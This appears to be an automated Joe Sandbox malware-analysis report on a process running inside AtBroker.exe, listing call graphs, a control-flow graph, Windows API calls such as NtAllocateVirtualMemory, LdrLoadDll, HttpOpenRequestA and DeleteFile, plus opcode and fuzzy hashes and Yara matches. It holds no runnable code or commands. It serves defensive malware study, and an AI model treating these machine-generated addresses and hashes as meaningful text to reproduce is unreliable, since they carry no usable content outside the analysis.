88542->88543 88544 4e21b4 88542->88544 88546 4e8c10 NtClose 88543->88546 88545 4e8c10 NtClose 88544->88545 88547 4e21bd 88545->88547 88548 4e21d1 88546->88548 88551 4eabd0 RtlAllocateHeap 88548->88551 88550 4e21dc 88551->88550 88552 4e6370 88553 4e63ca 88552->88553 88555 4e63d7 88553->88555 88556 4e3f00 88553->88556 88557 4eaa20 NtAllocateVirtualMemory 88556->88557 88558 4e3f41 88557->88558 88559 4d57a0 LdrLoadDll 88558->88559 88562 4e4046 88558->88562 88561 4e3f87 88559->88561 88560 4e3fc0 Sleep 88560->88561 88561->88560 88561->88562 88562->88555 88563 4d3bf3 88564 4d72b0 2 API calls 88563->88564 88565 4d3c13 88564->88565 88826 4e9430 88827 4e9462 88826->88827 88828 4e94ad 88827->88828 88829 4e9486 HttpOpenRequestA 88827->88829

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 130 4cae40-4cb176 131 4cb17d-4cb184 130->131 132 4cb1b6-4cb1c0 131->132 133 4cb186-4cb1b4 131->133 134 4cb1d1-4cb1d8 132->134 133->131 135 4cb1da-4cb201 134->135 136 4cb203-4cb20a 134->136 135->134 137 4cb20c-4cb23f 136->137 138 4cb241-4cb24b 136->138 137->136 140 4cb25c-4cb268 138->140 141 4cb27f 140->141 142 4cb26a-4cb27d 140->142 144 4cb286-4cb28f 141->144 142->140 145 4cb2ab-4cb2bc 144->145 146 4cb291-4cb2a9 144->146 147 4cb2cd-4cb2d9 145->147 146->144 148 4cb2ec-4cb2f6 147->148 149 4cb2db-4cb2ea 147->149 151 4cb2f8-4cb317 148->151 152 4cb32a-4cb32e 148->152 149->147 155 4cb328 151->155 156 4cb319-4cb322 151->156 153 4cb349-4cb350 152->153 154 4cb330-4cb347 152->154 157 4cb3a2-4cb3e5 153->157 158 4cb352-4cb372 153->158 154->152 155->148 156->155 161 4cb3f6-4cb3ff 157->161 159 4cb379-4cb37b 158->159 160 4cb374-4cb378 158->160 162 4cb38c-4cb3a0 159->162 163 4cb37d-4cb386 159->163 160->159 164 4cb40f-4cb413 161->164 165 4cb401-4cb40d 161->165 162->153 163->162 167 4cb41f 164->167 168 4cb415-4cb41c 164->168 165->161 169 4cb426-4cb42f 167->169 168->167 170 4cb63f-4cb646 169->170 171 4cb435-4cb43f 169->171 173 4cb64c call 4ea740 170->173 174 4cb742-4cb74c 170->174 172 4cb450-4cb459 171->172 175 4cb45b-4cb468 172->175 176 4cb475-4cb479 172->176 180 4cb651-4cb655 173->180 178 4cb46a-4cb470 175->178 179 4cb473 175->179 181 4cb47b-4cb4a0 176->181 182 4cb4a2-4cb4ac 176->182 178->179 179->172 184 4cb678-4cb682 180->184 185 4cb657-4cb676 180->185 181->176 186 4cb4bd-4cb4c6 182->186 187 4cb693-4cb69f 184->187 185->180 188 4cb4dc-4cb4df 186->188 189 4cb4c8-4cb4da 186->189 190 4cb6b6-4cb6bd 187->190 191 4cb6a1-4cb6b4 187->191 193 4cb4e5-4cb4ec 188->193 189->186 195 4cb6bf-4cb6e7 190->195 196 4cb6e9-4cb6ed 190->196 191->187 197 4cb4ee-4cb521 193->197 198 4cb523-4cb532 193->198 195->190 201 4cb6ef-4cb714 196->201 202 4cb716-4cb71d 196->202 197->193 199 4cb539-4cb543 198->199 200 4cb534 198->200 204 4cb554-4cb55d 199->204 200->170 201->196 202->174 203 4cb71f-4cb735 202->203 205 4cb737-4cb73d 203->205 206 4cb740 203->206 207 4cb56d-4cb574 204->207 208 4cb55f-4cb56b 204->208 205->206 206->202 210 4cb595-4cb5a9 207->210 211 4cb576-4cb593 207->211 208->204 212 4cb5ba-4cb5c6 210->212 211->207 213 4cb5c8-4cb5d5 212->213 214 4cb5d7-4cb5e3 212->214 213->212 216 4cb5e5-4cb600 214->216 217 4cb602-4cb60c 214->217 216->214 218 4cb61d-4cb629 217->218 219 4cb63a 218->219 220 4cb62b-4cb638 218->220 219->169 220->218
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "R$-,9$.|$9V$F&$F)$Fq$G$H$Kb$Le$U$V`$W$a@$b$e$f$m$t[Kb$u$zg$}>
                                                                    • API String ID: 0-1168918428
                                                                    • Opcode ID: 19c8f57019d76960cc648c616f23a8de60a74612b7c4421735638349fb4feb07
                                                                    • Instruction ID: 86ea5ec4316570ad1d97910d5dc5fffb33260252bbd1ee5061a0dc91e1b75e03
                                                                    • Opcode Fuzzy Hash: 19c8f57019d76960cc648c616f23a8de60a74612b7c4421735638349fb4feb07
                                                                    • Instruction Fuzzy Hash: B132D2B4E05228CBEB64CF45C995BDDBBB2FF85308F1081DAC1096B291C7B95A85CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(0M,?,?,00000000,00000004,00003000,00000004,00000000,?,?,004D30E8,?,?), ref: 004E8DEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID: 0M$0M
                                                                    • API String ID: 2167126740-3498604872
                                                                    • Opcode ID: 1f16826501cdef62a32a87dcd2d00b6008b56a0ff25c08a792a10c21c0c4454f
                                                                    • Instruction ID: 6e3187e9699738e102f5afa9d1e09cb6171b7363097450d6a2930da5eae2860c
                                                                    • Opcode Fuzzy Hash: 1f16826501cdef62a32a87dcd2d00b6008b56a0ff25c08a792a10c21c0c4454f
                                                                    • Instruction Fuzzy Hash: 541119B6200245BFDB14DF99DC81EAB73ADEFC9718F10850EFA1897241DA34A911CBB5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,00000000), ref: 004DD2A4
                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 004DD2DF
                                                                    • FindClose.KERNEL32(?), ref: 004DD2EA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 43aa0383ec3200e12579adb78577bfc42a337f4ce00c9519131ef013542de78f
                                                                    • Instruction ID: 58cd127f9f3e1bc9c5c56d3e5f619da3f51d62b1a7d516421de5975db18400ca
                                                                    • Opcode Fuzzy Hash: 43aa0383ec3200e12579adb78577bfc42a337f4ce00c9519131ef013542de78f
                                                                    • Instruction Fuzzy Hash: 0C31B471900248BBDB20DF61CC85FFF777CAF44709F14459EB909A7281D6B4AA858BA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004E8A61
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                                                    • Instruction ID: dafbbb58aee12c43cfef3dc5de0d7cf2dc9e350d3130ce35e9bb8de671807a04
                                                                    • Opcode Fuzzy Hash: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                                                    • Instruction Fuzzy Hash: 3F21AEB2201648BBDB44DF99DC81EEB77EDAB8C714F10820DFA1993241D634E9518BA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 004E8B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                                                    • Instruction ID: 053a460adf33150eeae04beb95d512e4782942ce37f94856fe02784f497b3394
                                                                    • Opcode Fuzzy Hash: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                                                    • Instruction Fuzzy Hash: 1A21E5B2200648AFDB04DF99DC81EAB73EDAF8C714F10820DBA5893241D634A9118BA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: 308279b301a110b5b29dad7a973b68a99b80501d37a1822c39e1763389cc6a7d
                                                                    • Instruction ID: f5b08f7d6e2e2ff0a812594a0fbce248df096a15e8aa6b18e6fff6f346667803
                                                                    • Opcode Fuzzy Hash: 308279b301a110b5b29dad7a973b68a99b80501d37a1822c39e1763389cc6a7d
                                                                    • Instruction Fuzzy Hash: 10016D756006447FD610EB6ADC41FAB73ACEFC5719F10840EF95C57242DA7A7A00C7A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(004E21D1,?,00000000,004D46BC,?,004E21D1,004D46BC,0000C994,?,?,?,?,?,?,?,004E58D6), ref: 004E8C47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_4c0000_AtBroker.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                                                    • Instruction ID: 68e5730c8a788b37b8e0039cd2b5066478b97944385e0105326b4a285297f082
                                                                    • Opcode Fuzzy Hash: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                                                    • Instruction Fuzzy Hash: A2E046762002147BD220FA6ACC01FABB7ACDBC5715F00841AFA0CAB242C675B91187A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8575229566520007df1afb1028ceaed08709901afd15e0d1e8e986dccfc5ed09
                                                                    • Instruction ID: 9599c2a0ab6a85e89c5b5692e727b095284663d6fa00e3b8c8dad5d51eef763a
                                                                    • Opcode Fuzzy Hash: 8575229566520007df1afb1028ceaed08709901afd15e0d1e8e986dccfc5ed09
                                                                    • Instruction Fuzzy Hash: 9F900261601500436140715858084067045ABE1315399C135A0555560C8618D955A269
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1d4583b77ccd23086a2e4737c854938567f17ec0cc596ae08ebf28e34a3ac038
                                                                    • Instruction ID: 81510fab2e949f98491526d64c00813c6b6abbdad1d2cdd1b4bac12ab9b24b4e
                                                                    • Opcode Fuzzy Hash: 1d4583b77ccd23086a2e4737c854938567f17ec0cc596ae08ebf28e34a3ac038
                                                                    • Instruction Fuzzy Hash: 9590023160580013B140715858885465045ABE0315B59C031E0425554C8A14DA566361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b5766750caea770d47f54f3354097a1905d73c0762c21f8ab5efda151c056c6a
                                                                    • Instruction ID: 3aebcc3268bf03d8dc1ea83923fe353b7d8e9493994361c40fd30458617ba0e6
                                                                    • Opcode Fuzzy Hash: b5766750caea770d47f54f3354097a1905d73c0762c21f8ab5efda151c056c6a
                                                                    • Instruction Fuzzy Hash: 7390023120148803F1107158940874A10459BD0315F5DC431A4425658D8695D9917121
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7e5e433df6d5a9ac1e10947a9cea021ceac3e7bf4aa8f84f7bc876d4d5588c7a
                                                                    • Instruction ID: b37747ef8295d8593ddbce10c8c2a42d96818a5a47524dbb732ebd7880f80172
                                                                    • Opcode Fuzzy Hash: 7e5e433df6d5a9ac1e10947a9cea021ceac3e7bf4aa8f84f7bc876d4d5588c7a
                                                                    • Instruction Fuzzy Hash: 6790023120140843F10071585408B4610459BE0315F59C036A0125654D8615D9517521
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 77b46203e981011018b40a47edeb397a7f29ba8a6ad03cdc510f6d4b3382c674
                                                                    • Instruction ID: 36b9de2948e03100b35f0890adb11add5e06da49615dace01c63f63527f1c797
                                                                    • Opcode Fuzzy Hash: 77b46203e981011018b40a47edeb397a7f29ba8a6ad03cdc510f6d4b3382c674
                                                                    • Instruction Fuzzy Hash: 5590023120140403F1007598640C64610459BE0315F59D031A5025555EC665D9917131
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6d732fe35c4a03fac7c5a297063bb0cbc4d37e97fcec2eab12e33f4249c0ca45
                                                                    • Instruction ID: c4f1f30ad581d7bbd5e09a630620873c57e8b684c0a440dce488397cc2dcf160
                                                                    • Opcode Fuzzy Hash: 6d732fe35c4a03fac7c5a297063bb0cbc4d37e97fcec2eab12e33f4249c0ca45
                                                                    • Instruction Fuzzy Hash: 3690022921340003F1807158640C60A10459BD1216F99D435A0016558CC915D9696321
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cb85540d30cd2ec019ef99d03c2388efb483bf48efcac02807afc749d4312ac7
                                                                    • Instruction ID: 7176a0fd1e0dde6f5c42550b6afa8689f1dc369af115920b0761f421aa11af67
                                                                    • Opcode Fuzzy Hash: cb85540d30cd2ec019ef99d03c2388efb483bf48efcac02807afc749d4312ac7
                                                                    • Instruction Fuzzy Hash: 0590022130140003F1407158641C6065045EBE1315F59D031E0415554CD915D9566222
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cde451b99e3f2d3380d9d8b977b861a84b93b104b765f6758b801af233615349
                                                                    • Instruction ID: f652665364870cbd1bbdeaa18f076d085747b3992ed60fe1dbc8f614913927d3
                                                                    • Opcode Fuzzy Hash: cde451b99e3f2d3380d9d8b977b861a84b93b104b765f6758b801af233615349
                                                                    • Instruction Fuzzy Hash: C1900221242441537545B15854085075046ABE0255799C032A1415950C8526E956E621
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cdd8648885d8aeac0ba79785bf4633485294e83ee397b80d64eb9bbf0d8c9397
                                                                    • Instruction ID: 83eba4d7ff31e461e9b085085265cd7ff0b6360f97db9ccb89c114330edd2ed7
                                                                    • Opcode Fuzzy Hash: cdd8648885d8aeac0ba79785bf4633485294e83ee397b80d64eb9bbf0d8c9397
                                                                    • Instruction Fuzzy Hash: 2190023120140413F1117158550870710499BD0255F99C432A0425558D9656DA52B121
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: aea6b1159c21654584f1c88d29be93b8057756e62e1e78e1aaf7485c0c79aa8a
                                                                    • Instruction ID: 1b6ab8245d7e57eb1a30dda531db8ae4d04f5cfaf0ebd1060246f17021e78977
                                                                    • Opcode Fuzzy Hash: aea6b1159c21654584f1c88d29be93b8057756e62e1e78e1aaf7485c0c79aa8a
                                                                    • Instruction Fuzzy Hash: 6790026120180403F1407558580860710459BD0316F59C031A2065555E8A29DD517135
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3e36525ca44eeb732545a0dbcc4f2c3cff6b0952f10f9a42942c5ef4b8d1cae3
                                                                    • Instruction ID: dff98772c11ed911138017557a148e61c97f9f589ba87b848b20c2817f443ee8
                                                                    • Opcode Fuzzy Hash: 3e36525ca44eeb732545a0dbcc4f2c3cff6b0952f10f9a42942c5ef4b8d1cae3
                                                                    • Instruction Fuzzy Hash: 3290022160140503F10171585408616104A9BD0255F99C032A1025555ECA25DA92B131
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2c1563af0205f4ffa8d140e736a6325945c12b8c04c8e45ac57ae38c0122e091
                                                                    • Instruction ID: ee8edcbf621cb0824334b0e1d2472cbcb3100ee2f1618637eb91acfb5f077917
                                                                    • Opcode Fuzzy Hash: 2c1563af0205f4ffa8d140e736a6325945c12b8c04c8e45ac57ae38c0122e091
                                                                    • Instruction Fuzzy Hash: E290026134140443F10071585418B061045DBE1315F59C035E1065554D8619DD527126
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f726926354531e0c4240a0306e41afc85df0f4ae2d45be4f94f5cd4cc3fb07c9
                                                                    • Instruction ID: 42d19e272070ab2aece402a35d61c374bbd9b9140fe5c16974ec6d8eff97cdc4
                                                                    • Opcode Fuzzy Hash: f726926354531e0c4240a0306e41afc85df0f4ae2d45be4f94f5cd4cc3fb07c9
                                                                    • Instruction Fuzzy Hash: 38900221211C0043F20075685C18B0710459BD0317F59C135A0155554CC915D9616521
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2946497074.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2946497074.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2946497074.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_44f0000_AtBroker.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 80162b598cb603bbaef9173b013ee15ab2a6818cc1f2e6b836f2b550a5b171da
                                                                    • Instruction ID: b1f4acab9003b0547cb9631ffc3705c340c0b5c36a6d00348cdf20d3daeddb43
                                                                    • Opcode Fuzzy Hash: 80162b598cb603bbaef9173b013ee15ab2a6818cc1f2e6b836f2b550a5b171da
                                                                    • Instruction Fuzzy Hash: AD900221601400436140716898489065045BFE1225759C131A0999550D8559D9656665
                                                                    Uniqueness

